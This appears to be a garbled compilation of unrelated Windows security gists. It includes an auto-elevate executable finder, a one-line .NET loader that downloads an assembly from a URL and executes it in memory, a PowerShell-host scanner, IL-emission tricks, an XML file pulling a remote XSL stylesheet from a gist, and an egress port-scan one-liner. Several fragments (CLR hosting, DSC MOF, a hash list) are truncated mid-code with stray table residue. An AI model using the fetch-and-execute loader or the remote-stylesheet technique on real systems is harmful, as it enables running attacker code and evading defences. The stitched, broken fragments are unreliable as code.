# Find Autoelevate executables
# Greps the PE files under both system directories for an embedded application
# manifest that declares <autoElevate>true</autoElevate> and prints every match
# (Select-String matches case-insensitively by default, so the manifest's own
# camel-case spelling is found). The two sections are separated by a blank line.
$manifestPattern = '<AutoElevate>true'

Write-Host 'System32 Autoelevate Executables' -ForegroundColor Green -BackgroundColor Black
Get-ChildItem -Path 'C:\Windows\System32\*.exe' | Select-String -Pattern $manifestPattern

Write-Host "`nSysWOW64 Autoelevate Executables" -ForegroundColor Green -BackgroundColor Black
Get-ChildItem -Path 'C:\Windows\SysWOW64\*.exe' | Select-String -Pattern $manifestPattern
# This gist has been moved into a Git repository and no longer receives updates.
#
# Please visit the GitHub repository for the current list:
# https://github.com/Neo23x0/ti-falsepositives/
# Hashes that often appear in IOC lists but are false positives
HASH_WHITELIST = [ | |
# Empty file | |
'd41d8cd98f00b204e9800998ecf8427e', | |
'da39a3ee5e6b4b0d3255bfef95601890afd80709', |
// Minimal .NET in-memory loader: downloads a byte[] from the URL given as the
// first command-line argument, loads it as an assembly directly from memory
// (no file on disk), then invokes the first public method of the assembly's
// first type with no parameters. The instance argument is a boxed 0, so the
// target method is presumably expected to be static — nothing here checks that.
// Nothing is verified about what was downloaded: no hash, signature or
// Authenticode check, so whatever the URL returns runs with this process's
// privileges. args[0] is also unchecked (no arguments -> IndexOutOfRangeException;
// a non-managed payload -> BadImageFormatException from Assembly.Load).
// From a defender's view this is the pattern to detect: Assembly.Load(byte[])
// fed straight from a network read, surfacing as a module load with no backing
// file path.
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
import sage.all | |
import hashlib | |
# part1 - https://www.youtube.com/watch?v=Vgdhlh6evjI | |
# part2 - https://www.youtube.com/watch?v=EOlddNofKxo | |
# prepare a table of bits | |
def bits_of(x): | |
bits = [] | |
for c in "{:08b}".format(x): |
# Author: Matt Graeber, SpecterOps
# Walks every *.exe and *.dll under C:\ and prints the full path of each managed
# binary whose referenced assemblies include System.Management.Automation, i.e.
# binaries that host the PowerShell engine themselves. Files that are not
# managed assemblies (or cannot be read) make ReflectionOnlyLoadFrom throw and
# are skipped on purpose; directory access errors are likewise suppressed.
Get-ChildItem -Path 'C:\*' -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | ForEach-Object {
    try {
        $referenced = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName).GetReferencedAssemblies()
        if ($referenced.Name -contains 'System.Management.Automation') {
            $_.FullName
        }
    } catch {
        # best-effort scan: native images and unreadable files are expected here
    }
}
# This idea originated from this blog post on Invoke DSC Resources directly: | |
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/ | |
<# | |
$MOFContents = @' | |
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref | |
{ | |
ResourceID = "[Script]ScriptExample"; | |
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; |
# Builds a DynamicMethod at run time whose IL body is emitted opcode by opcode
# from raw numeric values rather than the public OpCodes.* fields: the OpCode
# structs are constructed through the non-public OpCode(OpCodeValues, int)
# constructor via Activator. The four values are ldarg.0 (2), ldarg.1 (3),
# add (88 = 0x58) and ret (42 = 0x2A), so the resulting delegate is an unsigned
# 32-bit add; the second element of each pair is the packed opcode flags word.
# The method is then wrapped as Func<uint,uint,uint> and called with (2, 3).
$method = New-Object Reflection.Emit.DynamicMethod('💩', [UInt32], @([UInt32], [UInt32]))
$il = $method.GetILGenerator()

$opCodeType = [System.Reflection.Emit.OpCode]
$opCodeValuesType = $opCodeType.Assembly.GetType('System.Reflection.Emit.OpCodeValues')
$opCodes = @(@(2, 275120805), @(3, 275120805), @(88, -261739867), @(42, 23440101))

foreach ($pair in $opCodes) {
    $ctorArgs = @(($pair[0] -as $opCodeValuesType), $pair[1])
    $opCode = [Activator]::CreateInstance($opCodeType, [Reflection.BindingFlags] 'NonPublic, Instance', $null, $ctorArgs, $null)
    $il.Emit($opCode)
}

$adder = $method.CreateDelegate([Func``3[UInt32, UInt32, UInt32]])
$adder.Invoke(2, 3)
<?xml version="1.0"?>
<!-- The xml-stylesheet processing instruction below points at a remote XSL
     file hosted on gist.githubusercontent.com. Any XSLT-capable consumer that
     honours the PI will fetch and apply that stylesheet when rendering this
     document, and some XSLT processors allow stylesheets to carry executable
     script extensions, so how this file is processed is controlled by whoever
     controls that URL rather than by the document itself. The data payload is
     a single <customer> record. -->
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
# Ugly PowerShell egress check one-liner (works in Constrained Language Mode)
# NMap top 50 ports. Checking > 50 may cause Memory DoS
# One background job is started per port (each Start-Job emits its Job object to
# the pipeline, so those are printed as they are created); every job runs a single
# Test-NetConnection against the target. Afterwards all jobs are waited on and
# their output collected. Each job is a separate PowerShell host, which is why a
# much longer port list is expensive in memory.
$target = '10.10.10.10'
$ports = 50,21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,515,548,554,587,646,993,995,1025,1026,1027,1433,1720,1723,2000,2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154

foreach ($port in $ports) {
    Start-Job -ScriptBlock { param($p, $t) & Test-NetConnection -ComputerName $t -Port $p } -ArgumentList $port, $target
}

# Wait-Job already passes the finished jobs through; the second Get-Job simply
# re-reads the job list before the results are received.
Get-Job | Wait-Job | Get-Job | Receive-Job